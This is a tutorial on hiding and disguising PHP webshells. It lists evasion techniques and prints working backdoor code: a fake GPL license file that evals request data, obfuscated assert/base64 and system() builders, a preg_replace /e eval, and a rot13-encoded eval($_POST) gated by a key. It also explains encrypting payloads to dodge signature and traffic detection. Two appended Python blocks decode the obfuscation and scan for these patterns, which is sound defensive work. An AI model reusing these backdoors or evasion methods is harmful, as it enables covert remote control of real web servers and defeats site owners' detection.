A set of PHP hidden-shell techniques: hiding and disguising webshells

1. Change the default password.

2. Rename the file so it blends into the directory it was uploaded to, choosing a fairly "ordinary" name (for example indexi.php) so that nothing about the file stands out at a glance.

3. Disguise the file size so it looks like a normal script.

4. Insert the webshell payload into one of the site's own legitimate .php files (the insertion method); ordinary regex matching has a hard time finding this kind of webshell.

5. Obfuscating the webshell file:

1) obfuscating variable names

2) inserting large amounts of useless random strings

6. Mutation

1) Imitate standard, normal file names. For example, drop a file named LICESNE.php into a Joomla directory, a name that "does not look visually suspicious", with contents that closely resemble a normal LICENCE file:

http://blog.sucuri.net/2013/08/more-creative-backdoors-using-filename-typos.html

http://blog.sucuri.net/2013/08/open-source-backdoor-copyrighted-under-gnu-gpl.html

```php
<?php
/*GNU GENERAL PUBLIC LICENSE

TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

..

GNU GENERAL PUBLIC LICENSE

Version 2, June 1991

*/Copyright3_6_56()/*1989, 1991 Free Software Foundation, Inc.
675 Mass Ave, Cambridge, MA 02139, USA

Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.*/?>

Joomla! derives from copyrighted works licensed under the GNU General
Public License. This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses. Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders. A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file. A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.

<?php
Copyright3_6_56();

function Copyright3_6_56(){
    static $gnu = true;
    if(!$gnu) return;
    if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id'])) return;
    $gpl = implode('', $_REQUEST['gnu']);   // the 'gnu' request array is glued into a function name
    eval($gpl($_REQUEST['c_id']));          // that function is applied to c_id and the result evaluated
    $gnu = false;
}
?>
```

The only call in the "license" part sits wedged between two comment blocks, so a reader skimming the file sees nothing but GPL text.

2) Mutating the executing function

```php
<?php
$_="";
$_[+$_]++;       // +$_ is 0; on older PHP an empty string indexed this way becomes array(0 => 1)
$_=$_."";        // array . "" yields the string "Array"
$___=$_[+""];//A // offset 0 of "Array"
$____=$___;
$____++;//B      // ++ on a one-letter string advances the letter
$_____=$____;
$_____++;//C
$______=$_____;
$______++;//D
$_______=$______;
$_______++;//E
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O
$_________=$________;
$_________++;$_________++;$_________++;$_________++;//S
$_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++;//R
$_____=$_________;
$_____++;//T
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbMV0p"));
//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbMV0p"));
//ASSERT("eval($_POST[1])");
//key:=1
?>
```

A similar example:

http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
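To see what an increment chain like the one above resolves to without executing it, the following Python (added here; not part of the original post) emulates PHP's string increment and replays the chain. The function names php_increment, advance and resolve_page_chain are my own, and the seed character relies on the older-PHP behaviour in which an empty string indexed with [] turns into an array.

```python
def php_increment(s: str) -> str:
    """Emulate PHP's $s++ on a non-numeric string: 'A'->'B', 'Az'->'Ba', 'Z'->'AA'."""
    if s == "":
        return "1"                      # PHP turns an empty string into "1"
    chars = list(s)
    for i in range(len(chars) - 1, -1, -1):
        c = chars[i]
        if c == "z":
            chars[i] = "a"              # wrap and carry into the next char to the left
        elif c == "Z":
            chars[i] = "A"
        elif c == "9":
            chars[i] = "0"
        elif c.isascii() and c.isalnum():
            chars[i] = chr(ord(c) + 1)  # plain advance, no carry
            return "".join(chars)
        else:
            return "".join(chars)       # a non-alphanumeric char stops the carry
    first = s[0]                        # carried past the first char: prepend one
    prefix = "1" if first.isdigit() else ("a" if first.islower() else "A")
    return prefix + "".join(chars)


def advance(s: str, times: int) -> str:
    """Apply php_increment() `times` times (one `$x++;` per step)."""
    for _ in range(times):
        s = php_increment(s)
    return s


def resolve_page_chain() -> tuple[str, str]:
    """Replay the chain from the sample above; return the two function names
    it assembles (PHP resolves function names case-insensitively)."""
    # $_=""; $_[+$_]++; makes $_ array(0 => 1) on older PHP; $_."" is then
    # the string "Array", so $_[+""] (offset 0) is the seed character "A".
    a = "Array"[0]
    b, c, d, e = advance(a, 1), advance(a, 2), advance(a, 3), advance(a, 4)
    o = advance(e, 10)   # ten $________++ steps: E -> O
    s = advance(o, 4)    # four $_________++ steps: O -> S
    first = b + a + s + e + "6" + "4" + "_" + d + e + c + o + d + e
    r = advance(o, 3)    # three more steps: O -> R
    t = advance(s, 1)    # S -> T
    second = a + s + s + e + r + t
    return first, second   # ("BASE64_DECODE", "ASSERT")
```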

3) Mutating the executed code (payload mutation)

3.1) Encode the webshell's payload as base64: this bypasses local signature-based detection software.

3.2) Encrypt the webshell's payload with a cipher (for example RSA with a 1024-bit key):

http://blog.sucuri.net/2013/10/backdoor-evasion-using-encrypted-content.html

3.2.1) Keep the private key together with the file: this bypasses network-traffic malware detection, because only ciphertext needs to cross the network. The drawback is that, for the file on disk, the key that decrypts this webshell's payload is exposed.

3.2.2) Send the private key along with the command in the network traffic: this bypasses local signature-based detection, because the key that decrypts the ciphertext never appears in the file on disk, which keeps the local webshell file confidential. The drawback is that the key now shows up in the network traffic, where traffic analysis can intercept it and decrypt the payload.

4) Mutating both the executing function and the executed code

```php
<?php
$aaaaa="sewtemznypianol";
// string offsets pick out s,y,s,t,e,m; the {} offset syntax was removed in PHP 8
$char_system=$aaaaa{0}.$aaaaa{8}.$aaaaa{0}.$aaaaa{3}.$aaaaa{1}.$aaaaa{5};
//die($char_system);
$aaaaaa="edoced46esab_n";
$char_base64_decode=$aaaaaa{11}.$aaaaaa{10}.$aaaaaa{9}.$aaaaaa{8}.$aaaaaa{7}.$aaaaaa{6}.$aaaaaa{12}.$aaaaaa{5}.$aaaaaa{4}.$aaaaaa{3}.
    $aaaaaa{2}.$aaaaaa{1}.$aaaaaa{0};   // "base64_decode"
//die($char_base64_decode);   // debug line, as with die($char_system) above; left active it would stop the script here
echo $char_system($char_base64_decode("aXBjb25maWc="));   // "aXBjb25maWc=" is base64 for "ipconfig"
?>
```

7. Adding junk code

1) Add random strings and other confusing elements to the webshell code; this gets past some "regex-based" detection software.

```php
<?php
$subject='any_thing_you_can_write';
$pattern="/^.*$/e";   // the /e modifier evaluates the replacement as PHP code (removed in PHP 7)
$payload='cGhwaW5mbygpOw==';
//cGhwaW5mbygpOw==: "phpinfo();"
$replacement=pack('H*','406576616c286261736536345f6465636f646528')."\"$payload\"))";
//406576616c286261736536345f6465636f646528: "@eval(base64_decode(" (0x40 is the '@' error-suppression operator)
preg_replace($pattern,$replacement,$subject);
?>
```

8. Polymorphism

1) Before the real webshell runs, it typically inspects the incoming parameters and only enters the real execution path when they match a condition.

This polymorphic technique not only evades some regex-based webshell detection systems but also avoids capture by some dynamic-sandbox detection tools, because a dynamic sandbox has a hard time reproducing the "start-up parameters" this webshell script requires.

```php
<?php
if($_REQUEST["code"]==pany)   // bare word: an undefined constant, read as the string "pany" before PHP 8
{
    echo str_rot13('riny($_CBFG[pzq]);');
    eval(str_rot13('riny($_CBFG[pzq]);'));   // rot13 of: eval($_POST[cmd]);
}
else
{
    // wrong or missing key: overwrite the file named after the script's own basename with 'helloworld'
    $url=$_SERVER['PHP_SELF'];
    $filename= end(explode('/',$url));
    $content='helloworld';
    $fp= fopen ("$filename","w");
    if(fwrite ($fp,$content))
    {
        fclose ($fp);
        die("error");   // note the inverted messages: a successful write reports "error"
    }
    else
    {
        fclose ($fp);
        die("good");
    }
    exit;
}
?>
```
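Every trick in sections 5 through 8 leaves a static trace in the file: a decoder applied to a literal, a function name built by increments or character offsets, a regex literal ending in /e, or a call wedged between comment blocks. As an added example (not from the original post), here is a small Python triage scanner whose heuristic rules target exactly those traces; the rule names are my own, and the samples are constructed to mirror the snippets on this page, not taken from any real site.

```python
import re

# Heuristic rules for the obfuscation tricks listed on this page. Each rule
# is a loose regex: a hit means "open this file and look", not "webshell".
RULES = [
    ("eval/assert fed from a request superglobal",
     r"\b(?:eval|assert)\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    ("variable function wrapping another call, e.g. $__($_(...))",
     r"\$\w+\s*\(\s*\$\w+\s*\("),
    ("name built by PHP string increment (runs of $x++;)",
     r"(?:\$\w+\+\+;\s*){3,}"),
    ("name assembled character by character from a string",
     r"(?:\$\w+[{\[]\d+[}\]]\s*\.\s*){5,}"),
    ("regex literal carrying the /e (eval) modifier",
     r"[\"']/[^\"']*/[a-z]*e[a-z]*[\"']"),
    ("decoder applied to a string literal",
     r"\b(?:str_rot13|base64_decode|pack)\s*\(\s*[\"']"),
    ("call sandwiched between two block comments (license-file disguise)",
     r"\*/\s*\w+\s*\([^)]*\)\s*;?\s*/\*"),
    ("request data joined with implode() before use",
     r"\bimplode\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
]
COMPILED = [(label, re.compile(rx, re.I)) for label, rx in RULES]

def scan(source: str) -> list[str]:
    """Return the label of every rule that fires on one PHP source text."""
    return [label for label, rx in COMPILED if rx.search(source)]

def scan_file(path: str) -> list[str]:
    """Scan one file on disk; undecodable bytes are replaced, not fatal."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan(fh.read())

# Constructed samples modelled on the page's snippets (not real site files).
SAMPLES = {
    "license.php": "/* GPL text */Copyright3_6_56()/* more text */\n"
                   "$gpl=implode('',$_REQUEST['gnu']);\n"
                   "eval($gpl($_REQUEST['c_id']));",
    "incr.php": "$____++;$____++;$____++;$____++;//B\n"
                "$__($_(\"ZXZhbCgkX1BPU1RbMV0p\"));",
    "flower.php": "$pattern=\"/^.*$/e\";\npreg_replace($pattern,$r,$s);",
    "rot13.php": "eval(str_rot13('riny($_CBFG[pzq]);'));",
    "clean.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, "->", scan(src) or "no hits")
```

The rot13 sample shows why the rules overlap: the naive eval-on-request rule misses it because the superglobal is rotated, but the decoder-on-literal rule still fires.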
